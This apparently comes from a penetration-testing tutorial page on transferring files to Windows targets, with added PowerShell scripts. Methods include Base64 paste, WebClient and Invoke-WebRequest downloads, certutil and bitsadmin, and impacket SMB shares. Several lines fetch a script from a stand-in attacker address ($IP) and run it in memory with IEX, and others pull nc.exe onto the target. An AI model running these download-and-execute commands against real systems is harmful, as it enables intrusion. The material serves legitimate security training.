A checksum (here, a cryptographic hash) is a fixed-length value derived from a file's contents: any change to the file, whether accidental corruption or deliberate tampering, produces a different value, so comparing the hash taken before a transfer with the one taken afterwards tells you whether the file arrived intact. On Windows, Get-FileHash generates one (it defaults to SHA256 when no -Algorithm is given). MD5 and SHA1 are good enough for spotting a corrupted or truncated transfer, but both have practical collision attacks, so use SHA256 whenever the hash is meant to protect against an adversary who could substitute a file.
```powershell
# Checksum using MD5
Get-FileHash C:\Users\Public\test.txt -Algorithm md5
# Checksum using SHA1
Get-FileHash C:\Users\Public\test.txt -Algorithm sha1
```
Copy/Paste Base64
```powershell
# Decode Base64 string and save it into Windows target
[IO.File]::WriteAllBytes("C:\Users\Public\test.txt", [Convert]::FromBase64String("SGVsbG8sV29ybGQK"))
```
Warning
While this method is convenient, it is not always usable. The Windows command line (cmd.exe) limits a single command to 8,191 characters, and a web shell may also fail when it is handed a very large string. When the encoded data exceeds that limit, split it into smaller chunks, append each chunk to a staging file on the target, and decode the reassembled file; then compare its hash with the original to confirm nothing was lost in the paste.
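As an added example that is not part of the original page, here is the chunked form of the Base64 transfer: the file is encoded and split into lines short enough to paste through cmd.exe or a web shell, reassembled on the target, decoded, and checked against a SHA256 hash taken before the transfer. The chunk size, the paths and the sample payload are assumptions chosen for illustration; the attacker-side half is written in PowerShell here so the whole thing is one runnable script, but base64 -w 0 on Linux produces the same encoding.

```powershell
# Added example (not from the original page): move a file as Base64 in chunks that each
# fit under cmd.exe's 8,191-character command limit, then verify the result by hash.
# The chunk size, paths and sample payload are assumptions for illustration.

$ChunkSize = 4000                                    # comfortably below 8,191 chars per pasted line
$Staging   = "C:\Users\Public\test.b64"              # reassembled Base64 text on the target
$Output    = "C:\Users\Public\test.txt"              # decoded file on the target

# --- Attacker side (run where the original file lives) ---
# Constructed sample payload; for a real file use [IO.File]::ReadAllBytes($path)
$payloadBytes = [Text.Encoding]::ASCII.GetBytes(("Hello,World`n" * 2000))
$expectedHash = (Get-FileHash -InputStream ([IO.MemoryStream]::new($payloadBytes)) -Algorithm SHA256).Hash
$b64          = [Convert]::ToBase64String($payloadBytes)

# Split into lines of at most $ChunkSize characters; each line is one paste into the shell.
$chunks = for ($i = 0; $i -lt $b64.Length; $i += $ChunkSize) {
    $b64.Substring($i, [Math]::Min($ChunkSize, $b64.Length - $i))
}

# --- Target side (each chunk is pasted as its own command) ---
Remove-Item -Path $Staging -ErrorAction SilentlyContinue
foreach ($chunk in $chunks) {
    Add-Content -Path $Staging -Value $chunk -NoNewline   # append without inserting CRLF
}

# Reassemble, decode, and verify against the hash taken on the attacker side.
$decoded = [Convert]::FromBase64String((Get-Content -Path $Staging -Raw))
[IO.File]::WriteAllBytes($Output, $decoded)
$actualHash = (Get-FileHash -Path $Output -Algorithm SHA256).Hash
if ($actualHash -ne $expectedHash) { throw "Hash mismatch: transfer corrupted" }
"OK: $Output ($($decoded.Length) bytes) SHA256=$actualHash"
```

Because Base64 decoding ignores whitespace, a stray newline between pasted chunks is harmless, but a missing or duplicated chunk is not; the hash comparison at the end is what catches that.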
PowerShell Web Downloads
In the commands below, $IP stands for the attacker's address. PowerShell does not expand variables inside single quotes, so either substitute the address literally or switch to double quotes.

```powershell
# Download a file into disk
(New-Object Net.WebClient).DownloadFile('http://$IP/test.txt','C:\Users\Public\test.txt')
# Download a file into disk (in the background)
(New-Object Net.WebClient).DownloadFileAsync('http://$IP/test.txt', 'C:\Users\Public\test.txt')
# Download a file in memory
IEX (New-Object Net.WebClient).DownloadString('http://$IP/test.ps1')
# Download a file in memory (IEX as pipeline)
(New-Object Net.WebClient).DownloadString('http://$IP/test.ps1') | IEX
```
Error
On a host where Internet Explorer's first-run setup has never been completed, Invoke-WebRequest can fail to download, because in Windows PowerShell 5.1 it uses the Internet Explorer engine to parse the HTML of a response.
The error looks something like this: ...cannot be parsed because the Internet Explorer engine is not available...
Pass the -UseBasicParsing parameter to Invoke-WebRequest to skip that parsing. The parameter belongs to Invoke-WebRequest only; the Net.WebClient calls above never touch the IE engine and are not affected.
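As an added example that is not the original page's code, the download below uses Invoke-WebRequest with -UseBasicParsing so it works on a host where the Internet Explorer engine is unavailable, forces TLS 1.2 for HTTPS URLs, and verifies the downloaded file's SHA256 hash before anything is done with it. The attacker address, the paths and the expected hash are assumptions, and the script needs a reachable web server at $IP, so unlike the other examples on this page it cannot run offline.

```powershell
# Added example, not from the original page. Assumes a web server at $IP serving test.txt
# and test.ps1; the address, paths and expected hash below are placeholders.
$IP           = "10.10.14.5"                     # assumed attacker host
$Dest         = "C:\Users\Public\test.txt"
$ExpectedHash = $null                            # set to the SHA256 from the attacker side to enforce verification

# Windows PowerShell 5.1 may still negotiate only SSL3/TLS1.0 by default; insist on TLS 1.2 for https:// URLs.
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

function Get-VerifiedFile {
    param([string]$Uri, [string]$OutFile, [string]$Sha256)
    # -UseBasicParsing skips the Internet Explorer engine that Invoke-WebRequest in
    # Windows PowerShell 5.1 otherwise uses to parse HTML; PowerShell 7 accepts and ignores it.
    Invoke-WebRequest -Uri $Uri -OutFile $OutFile -UseBasicParsing -ErrorAction Stop
    $actual = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    if ($Sha256 -and $actual -ne $Sha256) {
        Remove-Item -Path $OutFile -Force      # do not leave a tampered or truncated file behind
        throw "SHA256 mismatch for $Uri - expected $Sha256, got $actual"
    }
    return $actual
}

# Double quotes so $IP expands (single quotes would send the literal string '$IP').
$hash = Get-VerifiedFile -Uri "http://$IP/test.txt" -OutFile $Dest -Sha256 $ExpectedHash
"Downloaded $Dest SHA256=$hash"

# In-memory variant of the DownloadString + IEX pattern, again without the IE engine.
$script = (Invoke-WebRequest -Uri "http://$IP/test.ps1" -UseBasicParsing -ErrorAction Stop).Content
Invoke-Expression $script
```

Leaving $ExpectedHash empty lets the script run as a plain downloader; filling it in turns the same function into a transfer check, which is the habit worth keeping when tooling is pulled onto a target over a link you do not control.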
“Living off the land” was first used by Christopher Campbell @obscuresec and Matt Graeber @mattifestation at DerbyCon 3. The term LOLBins (Living off the Land Binaries) originated from a Twitter discussion about binaries that attackers can misuse for unintended actions.
On Windows, we can use the LOLBAS website to search for binaries that perform various functions. To find binaries for downloading or uploading files, use the /download or /upload operators.
Here are two commonly used LOLBins for downloading files. Both are well known to defenders: certutil with -urlcache is commonly flagged by Microsoft Defender and EDR products, and bitsadmin is deprecated (the supported replacement is the Start-BitsTransfer cmdlet), so expect either to be logged or blocked on a monitored host.

```powershell
# Download a file using bitsadmin
bitsadmin /transfer wcb /priority foreground http://$IP/test.txt C:\Users\Public\test.txt
# Download a file using certutil
certutil.exe -urlcache -split -f http://$IP/test.txt test.txt
```
SMB Downloads
Server Message Block (SMB) is a client-server protocol for accessing shared files, directories and other network resources such as printers. On Windows it is served directly over TCP port 445.
For transferring files using SMB, we need to set up an SMB server on our attack machine, then copy or move the files between the attack and target machines.
```shell
# Create the SMB server (Attacker machine)
sudo impacket-smbserver share -smb2support /tmp/smbshare
```

```powershell
# Copy a file from the SMB server (Target machine); with no destination given, copy writes into the current directory
copy \\$IP\share\nc.exe
```
Windows 10 version 1709, Windows Server 2019 and later block unauthenticated guest access to SMB2/SMB3 shares by default, and the copy fails with a message that the organization's security policies block unauthenticated guest access. To work around this, start the SMB server with a username and password and authenticate to it from the target when mapping the share.
```shell
# Create the SMB server with Authentication (Attacker machine)
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
```

```powershell
# Mount the SMB server (Target machine)
net use n: \\$IP\share /user:test test
copy n:\nc.exe
```
Disconnect
To disconnect, run the following command:
```powershell
net use n: /delete
```
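The authenticated mount, copy and disconnect done from PowerShell instead of net use, as an added example that is not part of the original page. It maps the share with explicit credentials (which is what gets past the guest-access block), copies nc.exe, checks its SHA256 hash, and removes the drive in a finally block so the mapping is torn down even when the copy fails. The attacker address, share name, credentials and file names are assumptions matching the placeholders used above, and the script needs the impacket-smbserver from the previous step to be reachable.

```powershell
# Added example (not from the original page): authenticated SMB copy with verification
# and cleanup. $IP, share, credentials and file names are assumptions matching the page's placeholders.
$IP       = "10.10.14.5"                               # assumed attacker host running impacket-smbserver
$Share    = "\\$IP\share"                              # double quotes so $IP expands
$Dest     = "C:\Users\Public\nc.exe"
$Expected = $null                                      # set to the SHA256 of nc.exe from the attacker side to enforce verification

# Build the credential object for the server started with -user test -password test.
$Password = ConvertTo-SecureString "test" -AsPlainText -Force
$Cred     = New-Object System.Management.Automation.PSCredential("test", $Password)

# Map the share as drive N: with explicit credentials. Without -Persist the drive exists
# only inside this PowerShell session, which is all the copy needs.
New-PSDrive -Name N -PSProvider FileSystem -Root $Share -Credential $Cred -ErrorAction Stop | Out-Null
try {
    Copy-Item -Path "N:\nc.exe" -Destination $Dest -ErrorAction Stop
    $actual = (Get-FileHash -Path $Dest -Algorithm SHA256).Hash
    if ($Expected -and $actual -ne $Expected) {
        Remove-Item -Path $Dest -Force
        throw "SHA256 mismatch for $Dest - expected $Expected, got $actual"
    }
    "Copied and verified $Dest SHA256=$actual"
}
finally {
    # Always tear down the mapping; this is the PowerShell equivalent of 'net use n: /delete'.
    Remove-PSDrive -Name N -Force
}
```

The finally block matters on a target: a share left mapped to the attacker's host is both an artifact for responders and a convenient lateral path for anyone else who lands in the same session.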
FTP Downloads
The File Transfer Protocol (FTP) is a standard communication protocol used for transferring computer files between a server and a client on a network. It operates as a clear-text protocol, meaning that data is sent in an unencrypted format.